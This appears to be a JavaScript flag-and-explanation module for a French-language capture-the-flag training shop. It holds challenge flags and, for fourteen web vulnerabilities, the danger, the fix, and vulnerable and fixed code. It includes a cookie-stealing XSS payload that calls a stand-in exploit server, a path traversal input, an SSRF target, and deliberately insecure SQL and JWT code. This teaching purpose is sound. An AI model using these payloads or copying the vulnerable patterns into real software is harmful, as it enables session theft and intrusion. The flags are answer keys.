const FLAGS = {
  DATA_EXPOSURE: 'ASY{4h_c3_f4m3ux_3ndp01nt_0ubl13}',
  IDOR: 'ASY{pr0f1l_v0l3_s4ns_4ut0r1s4t10n}',
  REFLECTED_XSS: 'ASY{r3ch3rch3_p13g33_p4r_l3_scr1pt}',
  SQLI: 'ASY{4dm1n_s4ns_m0t_d3_p4ss3}',
  SQLI_UNION: 'ASY{un10n_s3l3ct_s3cr3ts_3xtr41ts}',
  BUSINESS_LOGIC: 'ASY{b4nqu13r_4ux_cr3d1ts_1nf1n1s}',
  JWT_FORGING: 'ASY{j3t0n_f0rg3_4cc3s_t0t4l}',
  STORED_XSS: 'ASY{4v1s_emp01s0nn3_p4g3_p13g33}',
  ZERO_RATING: 'ASY{z3r0_3t01l3s_v4l1d4t10n_byp4ss}',
  MASS_ASSIGNMENT: 'ASY{m4ss_4ss1gn_r0l3_4dm1n}',
  CSRF: 'ASY{csrf_tr4nsf3rt_f0rc3}',
  PATH_TRAVERSAL: 'ASY{tr4v3rs4l_f1ch13r_s3cr3t}',
  SSRF: 'ASY{ssrf_r3qu3t3_1nt3rn3}',
  COOKIE_THEFT: 'ASY{c00k13_v0l3_xss_c0mpl3t}',
};

const FLAG_NAMES = {
  [FLAGS.DATA_EXPOSURE]: 'Sensitive Data Exposure',
  [FLAGS.IDOR]: 'IDOR',
  [FLAGS.REFLECTED_XSS]: 'Reflected XSS',
  [FLAGS.SQLI]: 'SQL Injection (Login Bypass)',
  [FLAGS.SQLI_UNION]: 'SQL Injection (UNION)',
  [FLAGS.BUSINESS_LOGIC]: 'Business Logic',
  [FLAGS.JWT_FORGING]: 'JWT Forging',
  [FLAGS.STORED_XSS]: 'Stored XSS',
  [FLAGS.ZERO_RATING]: 'Zero Rating',
  [FLAGS.MASS_ASSIGNMENT]: 'Mass Assignment',
  [FLAGS.CSRF]: 'CSRF',
  [FLAGS.PATH_TRAVERSAL]: 'Path Traversal',
  [FLAGS.SSRF]: 'SSRF',
  [FLAGS.COOKIE_THEFT]: 'Cookie Theft (XSS)',
};

const FLAG_POINTS = {
  [FLAGS.DATA_EXPOSURE]: { points: 10, difficulty: 'Facile' },
  [FLAGS.IDOR]: { points: 10, difficulty: 'Facile' },
  [FLAGS.REFLECTED_XSS]: { points: 15, difficulty: 'Moyen' },
  [FLAGS.SQLI]: { points: 15, difficulty: 'Moyen' },
  [FLAGS.SQLI_UNION]: { points: 20, difficulty: 'Difficile' },
  [FLAGS.BUSINESS_LOGIC]: { points: 15, difficulty: 'Moyen' },
  [FLAGS.JWT_FORGING]: { points: 15, difficulty: 'Moyen' },
  [FLAGS.STORED_XSS]: { points: 20, difficulty: 'Difficile' },
  [FLAGS.ZERO_RATING]: { points: 10, difficulty: 'Facile' },
  [FLAGS.MASS_ASSIGNMENT]: { points: 15, difficulty: 'Moyen' },
  [FLAGS.CSRF]: { points: 15, difficulty: 'Moyen' },
  [FLAGS.PATH_TRAVERSAL]: { points: 10, difficulty: 'Facile' },
  [FLAGS.SSRF]: { points: 20, difficulty: 'Difficile' },
  [FLAGS.COOKIE_THEFT]: { points: 20, difficulty: 'Difficile' },
};

const FLAG_EXPLANATIONS = {
  [FLAGS.DATA_EXPOSURE]: {
    danger: "Un endpoint de debug expose des secrets (clés JWT, identifiants admin). Un attaquant peut les utiliser pour compromettre toute l'application.",
    fix: "Supprimer les endpoints de debug en production. Ne jamais exposer de secrets dans les réponses API. Utiliser des variables d'environnement.",
    owasp: 'A05:2021 — Security Misconfiguration',
    vulnerableCode: `router.get('/config', (req, res) => {\n  res.json({ jwtSecret: 'secret', adminCredentials: {...} });\n});`,
    fixedCode: `// Supprimer l'endpoint en production\nif (process.env.NODE_ENV !== 'production') {\n  router.get('/config', requireAdmin, (req, res) => {\n    res.json({ appName: 'BananaShop', version: '1.0.0' });\n  });\n}`,
  },
  [FLAGS.IDOR]: {
    danger: "N'importe quel utilisateur authentifié peut accéder aux données de tous les autres utilisateurs en modifiant l'ID dans l'URL.",
    fix: "Vérifier côté serveur que l'utilisateur accède uniquement à ses propres ressources. Utiliser des UUIDs au lieu d'IDs séquentiels.",
    owasp: 'A01:2021 — Broken Access Control',
    vulnerableCode: `router.get('/:id', authenticate, (req, res) => {\n  const user = db.prepare('SELECT * FROM users WHERE id = ?').get(req.params.id);\n  res.json(user); // Pas de vérification !\n});`,
    fixedCode: `router.get('/:id', authenticate, (req, res) => {\n  if (parseInt(req.params.id) !== req.user.id) {\n    return res.status(403).json({ error: 'Access denied' });\n  }\n  // ... reste du code\n});`,
  },
  [FLAGS.REFLECTED_XSS]: {
    danger: "Du code JavaScript arbitraire s'exécute dans le navigateur de la victime. L'attaquant peut voler des cookies, rediriger, ou exfiltrer des données.",
    fix: "Ne jamais utiliser dangerouslySetInnerHTML avec des données utilisateur. Échapper toutes les sorties HTML. Utiliser une CSP stricte.",
    owasp: 'A03:2021 — Injection (XSS)',
    vulnerableCode: `// Serveur : renvoie le terme tel quel\nres.json({ products, searchTerm: search });\n// Client : l'affiche en HTML brut\n<span dangerouslySetInnerHTML={{ __html: displaySearch }} />`,
    fixedCode: `// Serveur : échapper le HTML\nconst escapeHtml = (s) => s.replace(/&/g,'&amp;').replace(/</g,'&lt;');\nres.json({ products, searchTerm: escapeHtml(search) });\n// Client : utiliser du texte\n<span>{displaySearch}</span>`,
  },
  [FLAGS.SQLI]: {
    danger: "Un attaquant peut se connecter en tant qu'admin sans connaître le mot de passe, accéder à toutes les données, ou modifier la base.",
    fix: "Utiliser des requêtes préparées (paramétrisées). Ne jamais concaténer les entrées utilisateur dans du SQL.",
    owasp: 'A03:2021 — Injection',
    vulnerableCode: `const user = db.prepare(\n  \`SELECT * FROM users WHERE username = '\${username}'\`\n).get();`,
    fixedCode: `const user = db.prepare(\n  'SELECT * FROM users WHERE username = ?'\n).get(username);`,
  },
  [FLAGS.SQLI_UNION]: {
    danger: "L'attaquant peut extraire des données de n'importe quelle table de la base via UNION SELECT, y compris des secrets, mots de passe, etc.",
    fix: "Requêtes préparées obligatoires. Limiter les privilèges de l'utilisateur base de données.",
    owasp: 'A03:2021 — Injection',
    vulnerableCode: `products = db.prepare(\n  \`SELECT ... FROM products WHERE name LIKE '%\${search}%'\`\n).all();`,
    fixedCode: `products = db.prepare(\n  'SELECT ... FROM products WHERE name LIKE ?'\n).all(\`%\${search}%\`);`,
  },
  [FLAGS.BUSINESS_LOGIC]: {
    danger: "Un attaquant peut se créditer un montant infini en envoyant des valeurs négatives. La logique métier est contournée.",
    fix: "Valider que le montant est strictement positif côté serveur. Ne jamais faire confiance aux données du client.",
    owasp: 'A04:2021 — Insecure Design',
    vulnerableCode: `const sendAmount = parseFloat(amount);\nif (isNaN(sendAmount)) { // Pas de check > 0 !\n  return res.status(400).json({ error: 'Invalid' });\n}`,
    fixedCode: `const sendAmount = parseFloat(amount);\nif (isNaN(sendAmount) || sendAmount <= 0) {\n  return res.status(400).json({ error: 'Amount must be positive' });\n}`,
  },
  [FLAGS.JWT_FORGING]: {
    danger: "Avec un secret faible ou l'algorithme 'none', un attaquant peut forger des tokens admin et accéder à toutes les fonctionnalités.",
    fix: "Utiliser un secret fort (256+ bits aléatoires). N'accepter que HS256. Stocker le secret dans les variables d'environnement.",
    owasp: 'A02:2021 — Cryptographic Failures',
    vulnerableCode: `const JWT_SECRET = 'secret';\njwt.verify(token, JWT_SECRET, {\n  algorithms: ['HS256', 'none'] // none = pas de signature !\n});`,
    fixedCode: `const JWT_SECRET = process.env.JWT_SECRET; // Secret fort\njwt.verify(token, JWT_SECRET, {\n  algorithms: ['HS256'] // Uniquement HS256\n});`,
  },
  [FLAGS.STORED_XSS]: {
    danger: "Le script malveillant est stocké en base et s'exécute chez TOUS les visiteurs. Vol de session massif, defacement, phishing.",
    fix: "Sanitiser les entrées (DOMPurify côté client, sanitize-html côté serveur). Ne jamais utiliser dangerouslySetInnerHTML.",
    owasp: 'A03:2021 — Injection (XSS)',
    vulnerableCode: `// Stockage sans sanitisation\ndb.prepare('INSERT INTO reviews ... VALUES (?, ?, ?, ?)').run(..., content, ...);\n// Affichage en HTML brut\n<div dangerouslySetInnerHTML={{ __html: review.content }} />`,
    fixedCode: `// Sanitiser avant stockage\nconst sanitizeHtml = require('sanitize-html');\nconst safe = sanitizeHtml(content, { allowedTags: [], allowedAttributes: {} });\n// Afficher en texte\n<div>{review.content}</div>`,
  },
  [FLAGS.ZERO_RATING]: {
    danger: "Le client peut contourner toute validation frontend en envoyant des requêtes directement à l'API. Les contraintes UI ne sont pas de la sécurité.",
    fix: "Toujours valider côté serveur. Le frontend est une commodité UX, pas une mesure de sécurité.",
    owasp: 'A04:2021 — Insecure Design',
    vulnerableCode: `const ratingValue = parseInt(rating);\nconst safeRating = isNaN(ratingValue) ? 5 : ratingValue;\n// Accepte 0, -1, 999...`,
    fixedCode: `const ratingValue = parseInt(rating);\nif (isNaN(ratingValue) || ratingValue < 1 || ratingValue > 5) {\n  return res.status(400).json({ error: 'Rating must be 1-5' });\n}`,
  },
  [FLAGS.MASS_ASSIGNMENT]: {
    danger: "Un utilisateur peut s'auto-promouvoir admin en ajoutant le champ 'role' dans une requête de mise à jour de profil.",
    fix: "Utiliser une whitelist de champs modifiables. Ne jamais propager aveuglément req.body dans une requête SQL.",
    owasp: 'A04:2021 — Insecure Design',
    vulnerableCode: `const { email, bio, username, role } = req.body;\n// role vient du client, pas de vérification !`,
    fixedCode: `const { email, bio, username } = req.body;\n// Ne PAS extraire 'role' du body\n// Seuls les admins peuvent modifier les rôles`,
  },
  [FLAGS.CSRF]: {
    danger: "Un site malveillant peut forcer le navigateur de la victime à effectuer des actions (transfert de crédits) sans son consentement.",
    fix: "Utiliser des tokens CSRF (synchronizer token pattern). Configurer SameSite=Strict sur les cookies. Vérifier l'en-tête Origin.",
    owasp: 'A01:2021 — Broken Access Control',
    vulnerableCode: `// Pas de token CSRF\n// Cookie: sameSite: 'lax' (pas 'strict')\n// Pas de vérification de l'Origin\nrouter.post('/send', authenticate, (req, res) => { ... });`,
    fixedCode: `// Vérifier l'Origin\nif (req.headers.origin !== EXPECTED_ORIGIN) {\n  return res.status(403).json({ error: 'CSRF detected' });\n}\n// Cookie: sameSite: 'strict'\n// + Token CSRF dans un header custom`,
  },
  [FLAGS.PATH_TRAVERSAL]: {
    danger: "Un attaquant peut lire n'importe quel fichier du serveur (code source, configuration, /etc/passwd) en manipulant le chemin du fichier.",
    fix: "Ne jamais construire des chemins de fichiers à partir d'entrées utilisateur. Utiliser path.basename() pour extraire le nom de fichier. Valider contre une whitelist.",
    owasp: 'A01:2021 — Broken Access Control',
    vulnerableCode: `const filePath = path.join('public/bananas', req.query.file);\nconst content = fs.readFileSync(filePath);\n// file=../../secret_flag.txt => lit le fichier secret !`,
    fixedCode: `const filename = path.basename(req.query.file); // Supprime ../\nconst filePath = path.join('public/bananas', filename);\n// Ou mieux : vérifier contre une whitelist`,
  },
  [FLAGS.SSRF]: {
    danger: "L'attaquant peut forcer le serveur à effectuer des requêtes vers des services internes (bases de données, APIs privées, cloud metadata).",
    fix: "Valider et filtrer les URLs. Bloquer les adresses internes (localhost, 127.0.0.1, 10.x, 192.168.x). Utiliser une whitelist de domaines.",
    owasp: 'A10:2021 — Server-Side Request Forgery',
    vulnerableCode: `// L'utilisateur fournit l'URL\nconst response = await fetch(req.body.url);\nconst data = await response.text();\nres.json({ content: data });\n// url=http://localhost:3000/api/internal/flag`,
    fixedCode: `const url = new URL(req.body.url);\nconst blocked = ['localhost','127.0.0.1','0.0.0.0','[::1]'];\nif (blocked.includes(url.hostname)) {\n  return res.status(400).json({ error: 'URL non autorisée' });\n}`,
  },
  [FLAGS.COOKIE_THEFT]: {
    danger: "Via XSS, l'attaquant vole le cookie de session et peut usurper l'identité de la victime. C'est l'attaque XSS la plus impactante.",
    fix: "Configurer httpOnly: true sur les cookies (inaccessible au JavaScript). Utiliser une CSP stricte. Sanitiser les entrées.",
    owasp: 'A03:2021 — Injection (XSS) + A07:2021 — Auth Failures',
    vulnerableCode: `// Cookie accessible au JavaScript\nres.cookie('token', token, { httpOnly: false });\n// XSS payload : fetch('http://exploit-server/steal?c='+document.cookie)`,
    fixedCode: `// Cookie inaccessible au JavaScript\nres.cookie('token', token, {\n  httpOnly: true,  // Pas accessible via document.cookie\n  secure: true,    // HTTPS uniquement\n  sameSite: 'strict'\n});`,
  },
};

const ALL_FLAGS = Object.values(FLAGS);

module.exports = { FLAGS, FLAG_NAMES, FLAG_POINTS, FLAG_EXPLANATIONS, ALL_FLAGS };
